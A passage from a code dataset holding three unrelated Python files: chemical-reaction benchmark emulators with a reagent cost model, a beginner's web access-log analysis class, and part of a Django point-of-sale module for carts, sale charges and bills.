columns=columns)\n >>> results = e.run_experiments(conditions)\n\n \"\"\"\n\n def __init__(\n self,\n domain,\n dataset=None,\n csv_dataset=None,\n model_name=\"dataset_name_emulator_bnn\",\n regressor_type=\"BNN\",\n cat_to_descr=False,\n **kwargs\n ):\n super().__init__(domain)\n dataset = self._check_datasets(dataset, csv_dataset)\n\n kwargs[\"cat_to_descr\"] = cat_to_descr\n\n if regressor_type == \"BNN\":\n self.emulator = BNNEmulator(\n domain=domain, dataset=dataset, model_name=model_name, kwargs=kwargs\n )\n try:\n self.extras = [self.emulator._load_model(model_name)]\n except:\n print(\n \"No trained model for {}. Train this model with ExperimentalEmulator.train() in order to use this Emulator as an virtual Experiment.\".format(\n self.emulator.model_name\n )\n )\n else:\n raise NotImplementedError(\n \"Regressor type <{}> not implemented yet\".format(str(regressor_type))\n )\n\n def _run(self, conditions, **kwargs):\n condition = DataSet.from_df(conditions.to_frame().T)\n infer_dict = self.emulator.infer_model(dataset=condition)\n for k, v in infer_dict.items():\n conditions[(k, \"DATA\")] = v\n return conditions, None\n\n def train(self, dataset=None, csv_dataset=None, verbose=True, **kwargs):\n dataset = self._check_datasets(dataset, csv_dataset)\n self.emulator.set_training_hyperparameters(kwargs=kwargs)\n self.emulator.train_model(dataset=dataset, verbose=verbose, kwargs=kwargs)\n self.extras = [self.emulator.output_models]\n\n def validate(\n self,\n dataset=None,\n csv_dataset=None,\n parity_plots=False,\n get_pred=False,\n **kwargs\n ):\n dataset = self._check_datasets(dataset, csv_dataset)\n if dataset is not None:\n return self.emulator.validate_model(\n dataset=dataset,\n parity_plots=parity_plots,\n get_pred=get_pred,\n kwargs=kwargs,\n )\n else:\n try:\n print(\"Evaluation based on training and test set.\")\n return self.emulator.validate_model(parity_plots=parity_plots)\n except:\n raise ValueError(\"No dataset to evaluate.\")\n\n def _check_datasets(self, dataset=None, csv_dataset=None):\n if csv_dataset:\n if dataset:\n print(\n \"Dataset and csv.dataset are given, hence dataset will be overwritten by csv.data.\"\n )\n dataset = DataSet.read_csv(csv_dataset, index_col=None)\n return dataset\n\n def to_dict(self, **kwargs):\n \"\"\"Serialize the class to a dictionary\n\n Subclasses can add a experiment_params dictionary\n key with custom parameters for the experiment\n \"\"\"\n kwargs.update(\n dict(\n model_name=self.emulator.model_name,\n dataset=self.emulator._dataset.to_dict()\n if self.emulator._dataset is not None\n else None,\n output_models=self.emulator.output_models,\n )\n )\n return super().to_dict(**kwargs)\n\n @classmethod\n def from_dict(cls, d):\n dataset = d[\"experiment_params\"][\"dataset\"]\n d[\"experiment_params\"][\"dataset\"] = DataSet.from_dict(dataset)\n exp = super().from_dict(d)\n exp.emulator.output_models = d[\"experiment_params\"][\"output_models\"]\n return exp\n\n\nclass ReizmanSuzukiEmulator(ExperimentalEmulator):\n \"\"\"Reizman Suzuki Emulator\n\n Virtual experiments representing the Suzuki-Miyaura Cross-Coupling reaction\n similar to Reizman et al. (2016). Experimental outcomes are based on an\n emulator that is trained on the experimental data published by Reizman et al.\n\n Parameters\n ----------\n case: int, optional, default=1\n Reizman et al. (2016) reported experimental data for 4 different\n cases. The case number refers to the cases they reported.\n Please see their paper for more information on the cases.\n\n Examples\n --------\n >>> reizman_emulator = ReizmanSuzukiEmulator(case=1)\n\n Notes\n -----\n This benchmark is based on data from [Reizman]_ et al.\n\n References\n ----------\n .. [Reizman] B. J. Reizman et al., React. Chem. Eng., 2016, 1, 658–666.\n DOI: `10.1039/C6RE00153J `_.\n\n \"\"\"\n\n def __init__(self, case=1, **kwargs):\n model_name = \"reizman_suzuki_case\" + str(case)\n domain = self.setup_domain()\n dataset_file = osp.join(\n osp.dirname(osp.realpath(__file__)),\n \"experiment_emulator/data/\" + model_name + \"_train_test.csv\",\n )\n super().__init__(domain=domain, model_name=model_name)\n\n def setup_domain(self):\n domain = Domain()\n\n # Decision variables\n des_1 = \"Catalyst type - different ligands\"\n domain += CategoricalVariable(\n name=\"catalyst\",\n description=des_1,\n levels=[\n \"P1-L1\",\n \"P2-L1\",\n \"P1-L2\",\n \"P1-L3\",\n \"P1-L4\",\n \"P1-L5\",\n \"P1-L6\",\n \"P1-L7\",\n ],\n )\n\n des_2 = \"Residence time in seconds (s)\"\n domain += ContinuousVariable(name=\"t_res\", description=des_2, bounds=[60, 600])\n\n des_3 = \"Reactor temperature in degrees Celsius (ºC)\"\n domain += ContinuousVariable(\n name=\"temperature\", description=des_3, bounds=[30, 110]\n )\n\n des_4 = \"Catalyst loading in mol%\"\n domain += ContinuousVariable(\n name=\"catalyst_loading\", description=des_4, bounds=[0.5, 2.5]\n )\n\n # Objectives\n des_5 = (\n \"Turnover number - moles product generated divided by moles catalyst used\"\n )\n domain += ContinuousVariable(\n name=\"ton\",\n description=des_5,\n bounds=[0, 200], # TODO: not sure about bounds, maybe redefine\n is_objective=True,\n maximize=False,\n )\n\n des_6 = \"Yield\"\n domain += ContinuousVariable(\n name=\"yield\",\n description=des_6,\n bounds=[0, 100],\n is_objective=True,\n maximize=True,\n )\n\n return domain\n\n def to_dict(self):\n \"\"\"Serialize the class to a dictionary\"\"\"\n experiment_params = dict(\n case=self.emulator.model_name[-1],\n )\n return super().to_dict(**experiment_params)\n\n\nclass BaumgartnerCrossCouplingEmulator(ExperimentalEmulator):\n \"\"\"Baumgartner Cross Coupling Emulator\n\n Virtual experiments representing the Aniline Cross-Coupling reaction\n similar to Baumgartner et al. (2019). Experimental outcomes are based on an\n emulator that is trained on the experimental data published by Baumgartner et al.\n\n This is a five dimensional optimisation of temperature, residence time, base equivalents,\n catalyst and base.\n\n The categorical variables (catalyst and base) contain descriptors\n calculated using COSMO-RS. Specifically, the descriptors are the first two sigma moments.\n\n Examples\n --------\n >>> bemul = BaumgartnerCrossCouplingDescriptorEmulator()\n\n Notes\n -----\n This benchmark is based on data from [Baumgartner]_ et al.\n\n References\n ----------\n\n .. [Baumgartner] L. M. Baumgartner et al., Org. Process Res. Dev., 2019, 23, 1594–1601\n DOI: `10.1021/acs.oprd.9b00236 `_\n\n \"\"\"\n\n def __init__(self, **kwargs):\n model_name = kwargs.get(\"model_name\", \"baumgartner_aniline_cn_crosscoupling\")\n dataset_file = kwargs.get(\n \"dataset_file\", \"baumgartner_aniline_cn_crosscoupling.csv\"\n )\n domain = self.setup_domain()\n dataset_file = osp.join(\n osp.dirname(osp.realpath(__file__)),\n \"experiment_emulator/data/\" + dataset_file,\n )\n super().__init__(domain=domain, csv_dataset=dataset_file, model_name=model_name)\n\n def setup_domain(self):\n domain = Domain()\n\n # Decision variables\n des_1 = \"Catalyst type\"\n catalyst_df = DataSet(\n [\n [460.7543, 67.2057], # 30.8413, 2.3043, 0], #, 424.64, 421.25040226],\n [518.8408, 89.8738], # 39.4424, 2.5548, 0], #, 487.7, 781.11247064],\n [819.933, 129.0808], # 83.2017, 4.2959, 0], #, 815.06, 880.74916884],\n ],\n index=[\"tBuXPhos\", \"tBuBrettPhos\", \"AlPhos\"],\n columns=[\n \"area_cat\",\n \"M2_cat\",\n ], # , 'M3_cat', 'Macc3_cat', 'Mdon3_cat'] #,'mol_weight', 'sol']\n )\n domain += CategoricalVariable(\n name=\"catalyst\",\n description=des_1,\n levels=[\"tBuXPhos\", \"tBuBrettPhos\", \"AlPhos\"],\n descriptors=catalyst_df,\n )\n\n des_2 = \"Base\"\n base_df = DataSet(\n [\n [162.2992, 25.8165], # 40.9469, 3.0278, 0], #101.19, 642.2973283],\n [\n 165.5447,\n 81.4847,\n ], # 107.0287, 10.215, 0.0169], # 115.18, 534.01544123],\n [227.3523, 30.554], # 14.3676, 1.1196, 0.0127], # 171.28, 839.81215],\n [192.4693, 59.8367], # 82.0661, 7.42, 0], # 152.24, 1055.82799],\n ],\n index=[\"TEA\", \"TMG\", \"BTMG\", \"DBU\"],\n columns=[\"area\", \"M2\"], # , 'M3', 'Macc3', 'Mdon3'], # 'mol_weight', 'sol']\n )\n domain += CategoricalVariable(\n name=\"base\",\n description=des_2,\n levels=[\"DBU\", \"BTMG\", \"TMG\", \"TEA\"],\n descriptors=base_df\n )\n\n des_3 = \"Base equivalents\"\n domain += ContinuousVariable(\n name=\"base_equivalents\", description=des_3, bounds=[1.0, 2.5]\n )\n\n des_4 = \"Temperature in degrees Celsius (ºC)\"\n domain += ContinuousVariable(\n name=\"temperature\", description=des_4, bounds=[30, 100]\n )\n\n des_5 = \"residence time in seconds (s)\"\n domain += ContinuousVariable(name=\"t_res\", description=des_5, bounds=[60, 1800])\n\n des_6 = \"Yield\"\n domain += ContinuousVariable(\n name=\"yld\",\n description=des_6,\n bounds=[0.0, 1.0],\n is_objective=True,\n maximize=True,\n )\n\n return domain\n\n\nclass BaumgartnerCrossCouplingDescriptorEmulator(ExperimentalEmulator):\n \"\"\"Baumgartner Cross Coupling Emulator\n\n Virtual experiments representing the Aniline Cross-Coupling reaction\n similar to Baumgartner et al. (2019). Experimental outcomes are based on an\n emulator that is trained on the experimental data published by Baumgartner et al.\n\n The difference with this model is that it uses descriptors for the catalyst and base\n instead of one-hot encoding the options. The descriptors are the first two\n sigma moments from COSMO-RS.\n\n\n Parameters\n ----------\n\n Examples\n --------\n >>> bemul = BaumgartnerCrossCouplingDescriptorEmulator()\n\n Notes\n -----\n This benchmark is based on data from [Baumgartner]_ et al.\n\n References\n ----------\n\n .. [Baumgartner] L. M. Baumgartner et al., Org. Process Res. Dev., 2019, 23, 1594–1601\n DOI: `10.1021/acs.oprd.9b00236 `_\n\n \"\"\"\n\n def __init__(self, **kwargs):\n model_name = kwargs.get(\n \"model_name\", \"baumgartner_aniline_cn_crosscoupling_descriptors\"\n )\n dataset_file = kwargs.get(\n \"dataset_file\", \"baumgartner_aniline_cn_crosscoupling_descriptors.csv\"\n )\n domain = self.setup_domain()\n dataset_file = osp.join(\n osp.dirname(osp.realpath(__file__)),\n \"experiment_emulator/data/\" + dataset_file,\n )\n super().__init__(domain=domain, csv_dataset=dataset_file, model_name=model_name)\n\n def setup_domain(self):\n domain = Domain()\n\n # Decision variables\n des_1 = \"Catalyst type with descriptors\"\n catalyst_df = DataSet(\n [\n [460.7543, 67.2057, 30.8413, 2.3043, 0], # , 424.64, 421.25040226],\n [518.8408, 89.8738, 39.4424, 2.5548, 0], # , 487.7, 781.11247064],\n [819.933, 129.0808, 83.2017, 4.2959, 0], # , 815.06, 880.74916884],\n ],\n index=[\"tBuXPhos\", \"tBuBrettPhos\", \"AlPhos\"],\n columns=[\n \"area_cat\",\n \"M2_cat\",\n \"M3_cat\",\n \"Macc3_cat\",\n \"Mdon3_cat\",\n ], # ,'mol_weight', 'sol']\n )\n domain += CategoricalVariable(\n name=\"catalyst\", description=des_1, descriptors=catalyst_df\n )\n\n des_2 = \"Base type with descriptors\"\n base_df = DataSet(\n [\n [162.2992, 25.8165, 40.9469, 3.0278, 0], # 101.19, 642.2973283],\n [165.5447, 81.4847, 107.0287, 10.215, 0.0169], # 115.18, 534.01544123],\n [227.3523, 30.554, 14.3676, 1.1196, 0.0127], # 171.28, 839.81215],\n [192.4693, 59.8367, 82.0661, 7.42, 0], # 152.24, 1055.82799],\n ],\n index=[\"TEA\", \"TMG\", \"BTMG\", \"DBU\"],\n columns=[\"area\", \"M2\", \"M3\", \"Macc3\", \"Mdon3\"], # 'mol_weight', 'sol']\n )\n domain += CategoricalVariable(\n name=\"base\", description=des_2, descriptors=base_df\n )\n\n des_3 = \"Base equivalents\"\n domain += ContinuousVariable(\n name=\"base_equivalents\", description=des_3, bounds=[1.0, 2.5]\n )\n\n des_4 = \"Temperature in degrees Celsius (ºC)\"\n domain += ContinuousVariable(\n name=\"temperature\", description=des_4, bounds=[30, 100]\n )\n\n des_5 = \"residence time in seconds (s)\"\n domain += ContinuousVariable(name=\"t_res\", description=des_5, bounds=[60, 1800])\n\n des_6 = \"Yield\"\n domain += ContinuousVariable(\n name=\"yield\",\n description=des_6,\n bounds=[0.0, 1.0],\n is_objective=True,\n maximize=True,\n )\n\n return domain\n\n\nclass BaumgartnerCrossCouplingEmulator_Yield_Cost(BaumgartnerCrossCouplingEmulator):\n \"\"\"Baumgartner Cross Coupling Emulator\n\n Virtual experiments representing the Aniline Cross-Coupling reaction\n similar to Baumgartner et al. (2019). Experimental outcomes are based on an\n emulator that is trained on the experimental data published by Baumgartner et al.\n\n This is a multiobjective version for optimizing yield and cost simultaneously.\n\n Parameters\n ----------\n\n Examples\n --------\n >>> bemul = BaumgartnerCrossCouplingDescriptorEmulator()\n\n Notes\n -----\n This benchmark is based on data from [Baumgartner]_ et al.\n\n References\n ----------\n\n .. [Baumgartner] L. M. Baumgartner et al., Org. Process Res. Dev., 2019, 23, 1594–1601\n DOI: `10.1021/acs.oprd.9b00236 `_\n\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__()\n self.init_domain = self._domain\n self.mod_domain = self._domain + ContinuousVariable(\n name=\"cost\",\n description=\"cost in USD of 40 uL reaction\",\n bounds=[0.0, 1.0],\n is_objective=True,\n maximize=False,\n )\n self._domain = self.mod_domain\n\n def _run(self, conditions, **kwargs):\n # Change to original domain for running predictive model\n self._domain = self.init_domain\n conditions, _ = super()._run(conditions=conditions, **kwargs)\n\n # Calculate costs\n costs = self._calculate_costs(conditions)\n conditions[(\"cost\", \"DATA\")] = costs\n\n # Change back to modified domain\n self._domain = self.mod_domain\n return conditions, {}\n\n @classmethod\n def _calculate_costs(cls, conditions):\n catalyst = conditions[\"catalyst\"].values\n base = conditions[\"base\"].values\n base_equiv = conditions[\"base_equivalents\"].values\n\n # Calculate amounts\n droplet_vol = 40 * 1e-3 # mL\n mmol_triflate = 0.91 * droplet_vol\n mmol_anniline = 1.6 * mmol_triflate\n catalyst_equiv = {\n \"tBuXPhos\": 0.0095,\n \"tBuBrettPhos\": 0.0094,\n \"AlPhos\": 0.0094,\n }\n mmol_catalyst = [catalyst_equiv[c] * mmol_triflate for c in catalyst]\n mmol_base = base_equiv * mmol_triflate\n\n # Calculate costs\n cost_triflate = mmol_triflate * 5.91 # triflate is $5.91/mmol\n cost_anniline = mmol_anniline * 0.01 # anniline is $0.01/mmol\n cost_catalyst = np.array(\n [cls._get_catalyst_cost(c, m) for c, m in zip(catalyst, mmol_catalyst)]\n )\n cost_base = np.array(\n [cls._get_base_cost(b, m) for b, m in zip(base, mmol_base)]\n )\n tot_cost = cost_triflate + cost_anniline + cost_catalyst + cost_base\n if len(tot_cost) == 1:\n tot_cost = tot_cost[0]\n return tot_cost\n\n @staticmethod\n def _get_catalyst_cost(catalyst, catalyst_mmol):\n catalyst_prices = {\n \"tBuXPhos\": 94.08,\n \"tBuBrettPhos\": 182.85,\n \"AlPhos\": 594.18,\n }\n return float(catalyst_prices[catalyst] * catalyst_mmol)\n\n @staticmethod\n def _get_base_cost(base, mmol_base):\n # prices in $/mmol\n base_prices = {\n \"DBU\": 0.03,\n \"BTMG\": 1.2,\n \"TMG\": 0.001,\n \"TEA\": 0.01,\n }\n return float(base_prices[base] * mmol_base)\n","sub_path":"summit/benchmarks/experimental_emulator.py","file_name":"experimental_emulator.py","file_ext":"py","file_size_in_byte":20632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"418405016","text":"# isinstance dir opera\n# date: 2019/08/14\n\n\n# if type('hello') == str:\n# print('True')\n# else:\n# print('False')\n#\n#\n# if isinstance('hello', str):\n# print(\"True\")\n# else:\n# print(False)\n#\n#\n# if isinstance('world', (list, tuple, str)):\n# print(True)\n# else:\n# print(False)\n#\n\nclass Analysislog:\n def __init__(self, logPath):\n self.__path = logPath\n\n def getStatusCode(self):\n statusCode = {}\n with open(self.__path, 'r', encoding='utf8') as logfile:\n for lines in logfile:\n key = lines.split(\"=\")[10].split()[0]\n if key in ('200', '302', '304', '404', '502', '503', '504'):\n statusCode.setdefault(key, 0)\n statusCode[key] += 1\n return statusCode\n\n def getVpu(self):\n ips, info = [], 'pv: {:d} uv: {:d}'\n with open(self.__path, 'r', encoding='utf8') as logfile:\n for lines in logfile:\n ips.append(lines.split(\"=\")[3].split()[0])\n return info.format(len(ips), len(set(ips)))\n\n def getNatural(self):\n natural = {}\n with open(self.__path, 'r', encoding='utf8') as logfile:\n for lines in logfile:\n key = lines.split()[-2]\n natural.setdefault(key, 0)\n natural[key] += 1\n return natural\n\n\nl = dir(Analysislog)\nif 'getVpu' in l:\n print()\nelse:\n pass\n\nlog = Analysislog('./access_log')\n\nprint(isinstance(log, Analysislog))\n","sub_path":"02.pythonbasis/08.oop_inhert/04.isinstance_dir.py","file_name":"04.isinstance_dir.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"65700746","text":"from __future__ import absolute_import\nfrom celery import shared_task\nfrom celery import group, chain\nfrom switch.celery import app\nfrom celery.utils.log import get_task_logger\nfrom switch.celery import single_instance_task\n\nfrom django.shortcuts import render\nfrom django.utils import timezone\nfrom django.utils.timezone import utc\nfrom django.contrib.gis.geos import Point\nfrom django.db import IntegrityError\nimport simplejson as json\nimport pytz, time, os, random, string\nfrom django.utils.timezone import localtime\nfrom datetime import datetime\nfrom decimal import Decimal, ROUND_DOWN, ROUND_UP\nimport base64, re\nfrom django.core.files import File\nfrom django.db.models import Count, Sum\nfrom django.db import transaction\nimport numpy as np\nfrom django.db.models import Q, F\nimport operator\n#from secondary.channels.notify.mqtt import MqttServerClient\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.core import serializers\n\nfrom primary.core.administration.views import WebService\nfrom primary.core.api.views import Authorize\n\nfrom secondary.erp.pos.models import *\n\nimport logging\nlgr = logging.getLogger('secondary.erp.pos')\n\n\nclass Wrappers:\n\tdef bill_entry(self, item, purchase_order, balance_bf, payload):\n\t\tpurchase_order.cart_item.add(item)\n\n\n\t\ttransaction_reference = payload['bridge__transaction_id'] if 'bridge__transaction_id' in payload.keys() else None\n\n\t\t#ADD to Bill Manager for Payment deductions\n\t\tbill_manager = BillManager(credit=False,transaction_reference=transaction_reference,\\\n\t\t\t\taction_reference=payload['action_id'],order=purchase_order,amount=item.total,\\\n\t\t\t\tbalance_bf=balance_bf)\n\n\t\tbill_manager.save()\n\n\t\treturn bill_manager\n\n\n\tdef get_balance_bf(self, item, purchase_order, balance_bf):\n\t\tif item.currency == purchase_order.currency:\n\t\t\tbalance_bf = balance_bf + item.total\n\t\telse:\n\t\t\tforex = Forex.objects.filter(base_currency=purchase_order.currency, quote_currency=item.currency)\n\t\t\ttotal = Decimal(0)\n\t\t\tif forex.exists():\n\t\t\t\ttotal = item.total/forex[0].exchange_rate\n\n\t\t\tbalance_bf = balance_bf + total\n\t\t\tlgr.info('Forex Calculate balance_bf to %s|from: %s| %s' % (purchase_order.currency, item.currency, balance_bf) )\n\n\t\treturn balance_bf\n\n\n\tdef cart_update(self, cart_item, payload, quantity, sub_total, total):\n\n\t\tcart_item.quantity=quantity\n\t\tcart_item.sub_total=sub_total\n\t\tcart_item.total=total\n\t\tcart_item.details=self.transaction_payload(payload)\n\n\t\tcart_item.save()\n\n\t\treturn cart_item\n\n\n\tdef cart_entry(self, product_item, payload, quantity, sub_total, total):\n\t\tsession_gateway_profile = None\n\t\tstatus = CartStatus.objects.get(name='UNPAID')\n\n\t\tchannel = Channel.objects.get(id=payload['chid'])\n\n\t\tcart_item = CartItem(product_item=product_item,currency=product_item.currency,\\\n\t\t\tstatus=status,quantity=quantity,price=product_item.unit_cost,sub_total=sub_total,total=total,\\\n\t\t\tdetails=self.transaction_payload(payload), channel=channel)\n\n\t\tif 'session_gateway_profile_id' in payload.keys():\n\t\t\tsession_gateway_profile = GatewayProfile.objects.get(id=payload['session_gateway_profile_id'])\n\t\telse:\n\t\t\tsession_gateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\n\t\tcart_item.gateway_profile = session_gateway_profile\n\t\tif session_gateway_profile.institution == product_item.institution:\n\t\t\tcart_item.cart_type = CartType.objects.get(name='POS')\n\t\telse:\n\t\t\tcart_item.cart_type = CartType.objects.get(name='SHOP')\n\n\t\tif 'csrf_token' in payload.keys():\n\t\t\tcart_item.token = payload['csrf_token']\n\t\telif 'csrfmiddlewaretoken' in payload.keys():\n\t\t\tcart_item.token = payload['csrfmiddlewaretoken']\n\t\telif \"token\" in payload.keys():\n\t\t\tcart_item.token = payload['token']\n\n\t\tif 'callback_url' in payload.keys():\n\t\t\tcart_item.api_callback_url = payload['callback_url']\n\t\t\tcart_item.api_callback_status = APICallBackStatus.objects.get(name='CREATED')\n\t\t\tcart_item.api_gateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\tcart_item.save()\n\n\t\treturn cart_item\n\n\tdef sale_charge_item(self, balance_bf, item, payload, gateway):\n\t\t#Sale Charge Item Bill entry\n\t\tsale_charge_item = None\n\t\tsale_charge = SaleCharge.objects.filter(Q(min_amount__lt=balance_bf,max_amount__gt=balance_bf,credit=False),\\\n\t\t\t\t\t\tQ(Q(product_display=item.product_item.product_display)|Q(product_display=None)),\\\n\t\t\t\t\t\tQ(Q(product_type=item.product_item.product_type)|Q(product_type=None)),\\\n\t\t\t\t\t\tQ(Q(institution=item.product_item.institution)|Q(institution=None)),\\\n\t\t\t\t\t\tQ(Q(gateway=gateway)|Q(gateway=None)))\n\t\tfor sc in sale_charge:\n\n\t\t\tcharge = Decimal(0)\n\n\t\t\tif 'delivery_location_coord' in payload.keys():\n\t\t\t\tcoordinates = payload['delivery_location_coord']\n\t\t\t\tlongitude, latitude = coordinates.split(',', 1)\n\t\t\t\ttrans_point = Point(float(longitude), float(latitude))\n\t\t\t\tdistance = sc.main_location.distance(trans_point)\n\t\t\t\tdistance_in_km = Decimal(distance) * Decimal(100)\n\t\t\t\tif sc.min_distance<=distance_in_km and sc.max_distance>distance_in_km:\n\t\t\t\t\tcharge = (sc.charge_per_km * distance_in_km) + sc.charge_value\n\n\t\t\tproduct_item = sc.sale_charge_type.product_item\n\n\t\t\tif sc.is_percentage:\n\t\t\t\tcharge = charge + ((sc.charge_value/100)*Decimal(item.total))\n\t\t\telse:\n\t\t\t\tcharge = charge+sc.charge_value\n\n\t\t\tif sc.per_item:\n\t\t\t\tsale_charge_item = self.cart_entry(sc.sale_charge_type.product_item, payload, 1, charge, charge)\n\t\t\t\t#sale_charge_item = CartItem.objects.get(id=cart_item_id)\n\n\t\t\telse:\n\t\t\t\tsale_charge_exists = False\n\t\t\t\tif item.gateway_profile:\n\t\t\t\t\tsale_charge_items = CartItem.objects.filter(gateway_profile=item.gateway_profile, product_item=product_item)\n\t\t\t\t\tsale_charge_exists = sale_charge_items.exists()\n\t\t\t\telse:\n\t\t\t\t\tsale_charge_items = CartItem.objects.filter(token=item.token, product_item=product_item)\n\t\t\t\t\tsale_charge_exists = sale_charge_items.exists()\n\n\t\t\t\tif sale_charge_exists:\n\t\t\t\t\t#sale_charge_item = sale_charge_items[0]\n\t\t\t\t\tsale_charge_item = self.cart_update(sale_charge_items[0], payload, 1, charge, charge)\n\t\t\t\telse:\n\t\t\t\t\tsale_charge_item = self.cart_entry(sc.sale_charge_type.product_item, payload, 1, charge, charge)\n\t\t\t\t\t#sale_charge_item = CartItem.objects.get(id=cart_item_id)\n\n\t\treturn sale_charge_item\n\n\n\tdef sale_charge_bill_entry(self, balance_bf, item, payload, purchase_order, gateway):\n\t\tsale_charge_item = self.sale_charge_item(balance_bf, item, payload, gateway)\n\t\tif sale_charge_item:\n\t\t\tbalance_bf = self.get_balance_bf(sale_charge_item, purchase_order, balance_bf)\n\t\t\tbill_manager = self.bill_entry(sale_charge_item, purchase_order, balance_bf, payload)\n\t\treturn balance_bf\n\n\n\tdef sale_charge_bill(self, balance_bf, item, payload, purchase_order, gateway):\n\t\t#Sale Charge Item Bill entry\n\t\tsale_charge = SaleCharge.objects.filter(Q(min_amount__lt=balance_bf,max_amount__gt=balance_bf,credit=False),\\\n\t\t\t\t\t\tQ(Q(product_display=item.product_item.product_display)|Q(product_display=None)),\\\n\t\t\t\t\t\tQ(Q(product_type=item.product_item.product_type)|Q(product_type=None)),\\\n\t\t\t\t\t\tQ(Q(institution=item.product_item.institution)|Q(institution=None)),\\\n\t\t\t\t\t\tQ(Q(gateway=gateway)|Q(gateway=None)))\n\n\t\tfor sc in sale_charge:\n\t\t\tproduct_item = sc.sale_charge_type.product_item\n\t\t\tcharge = Decimal(0)\n\t\t\tif sc.is_percentage:\n\t\t\t\tcharge = charge + ((sc.charge_value/100)*Decimal(item.total))\n\t\t\telse:\n\t\t\t\tcharge = charge+sc.charge_value\n\n\t\t\tif sc.per_item:\n\t\t\t\tsale_charge_item = self.cart_entry(sc.sale_charge_type.product_item, payload, 1, charge, charge)\n\t\t\t\t#item = CartItem.objects.get(id=cart_item_id)\n\t\t\t\tbalance_bf = self.get_balance_bf(sale_charge_item, purchase_order, balance_bf)\n\t\t\t\tbill_manager = self.bill_entry(sale_charge_item, purchase_order, balance_bf, payload)\n\n\t\t\telse:\n\t\t\t\tif bill_manager.order.cart_item.filter(product_item=product_item).exists():\n\t\t\t\t\tlgr.info('Sale Charge Already Exists')\n\t\t\t\telse:\n\t\t\t\t\tsale_charge_item = self.cart_entry(sc.sale_charge_type.product_item, payload, 1, charge, charge)\n\t\t\t\t\t#item = CartItem.objects.get(id=cart_item_id)\n\t\t\t\t\tbalance_bf = self.get_balance_bf(sale_charge_item, purchase_order, balance_bf)\n\t\t\t\t\tbill_manager = self.bill_entry(sale_charge_item, purchase_order, balance_bf, payload)\n\n\t\treturn balance_bf\n\n\tdef transaction_payload(self, payload):\n\t\tnew_payload, transaction, count = {}, None, 1\n\t\tfor k, v in payload.items():\n\t\t\tkey = k.lower()\n\t\t\tif 'card' not in key and 'credentials' not in key and 'new_pin' not in key and \\\n\t\t\t 'validate_pin' not in key and 'password' not in key and 'confirm_password' not in key and \\\n\t\t\t 'pin' not in key and 'access_level' not in key and \\\n\t\t\t 'response_status' not in key and 'sec_hash' not in key and 'ip_address' not in key and \\\n\t\t\t 'service' not in key and key != 'lat' and key != 'lng' and \\\n\t\t\t key != 'chid' and 'session' not in key and 'csrf_token' not in key and \\\n\t\t\t 'csrfmiddlewaretoken' not in key and 'gateway_host' not in key and \\\n\t\t\t 'gateway_profile' not in key and 'transaction_timestamp' not in key and \\\n\t\t\t 'action_id' not in key and 'bridge__transaction_id' not in key and \\\n\t\t\t 'merchant_data' not in key and 'signedpares' not in key and \\\n\t\t\t key != 'gpid' and key != 'sec' and \\\n\t\t\t key not in ['ext_product_id','vpc_securehash','currency','amount'] and \\\n\t\t\t 'institution_id' not in key and key != 'response' and key != 'input' and \\\n\t\t\t key != 'repeat_bridge_transaction' and key != 'transaction_auth':\n\n\t\t\t\tif count <= 30:\n\t\t\t\t\tnew_payload[str(k)[:30] ] = str(v)[:40]\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\t\tcount = count+1\n\n\t\treturn json.dumps(new_payload)\n\n\nclass System(Wrappers):\n\n\tdef update_outgoing_payment(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\tpurchase_order = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\t\t\tpurchase_order.outgoing_payment=Outgoing.objects.get(id=payload['paygate_outgoing_id'])\n\t\t\tpurchase_order.save()\n\n\t\t\tpayload['response'] = 'Outgoing Payment Updated'\n\t\t\tpayload['response_status'] = '00'\n\t\texcept Exception as e:\n\t\t\tpayload['response'] = str(e)\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Update Outgoing Payment: %s\" % e)\n\n\t\treturn payload\n\n\n\n\tdef log_order_activity(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\ttry:\n\t\t\t\torder_product = OrderProduct.objects.filter(service__name=payload['SERVICE'])\n\n\t\t\t\tlgr.info('Got HEre')\n\t\t\t\tif 'currency' in payload.keys():\n\t\t\t\t\torder_product = order_product.filter(Q(currency__code=payload['currency'])|Q(currency=None))\n\n\t\t\t\tif 'payment_method' in payload.keys():\n\t\t\t\t\torder_product = order_product.filter(Q(payment_method__name=payload['payment_method'])\\\n\t\t\t\t\t\t\t\t|Q(payment_method=None))\n\n\t\t\t\tif 'product_type_id' in payload.keys():\n\t\t\t\t\torder_product = order_product.filter(Q(product_type__id=payload['product_type_id'])\\\n\t\t\t\t\t\t\t\t|Q(product_type=None))\n\n\t\t\t\tif 'product_item_id' in payload.keys():\n\t\t\t\t\tproduct_item = ProductItem.objects.get(id=payload['product_item_id'])\n\t\t\t\t\torder_product = order_product.filter(Q(product_type=product_item.product_type)\\\n\t\t\t\t\t\t\t\t|Q(product_type=None))\n\n\t\t\t\tif 'ext_product_id' in payload.keys():\n\t\t\t\t\torder_product = order_product.filter(ext_product_id=payload['ext_product_id'])\n\n\t\t\t\tlgr.info('Got HEre')\n\t\t\t\tif order_product.exists():\n\t\t\t\t\t#log \n\t\t\t\t\tresponse_status = ResponseStatus.objects.get(response='DEFAULT')\n\t\t\t\t\tstatus = TransactionStatus.objects.get(name=\"CREATED\")\n\t\t\t\t\torder = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\t\t\t\t\tchannel = Channel.objects.get(id=payload['chid'])\n\t\t\t\t\tlgr.info('Got HEre')\n\n\t\t\t\t\treference = payload['bridge__transaction_id'] if 'bridge__transaction_id' in payload.keys() else ''\n\t\t\t\t\t\n\t\t\t\t\torder_activity = OrderActivity(order_product=order_product[0], order=order, transaction_reference=reference,\\\n\t\t\t\t\t\t\tgateway_profile=gateway_profile, 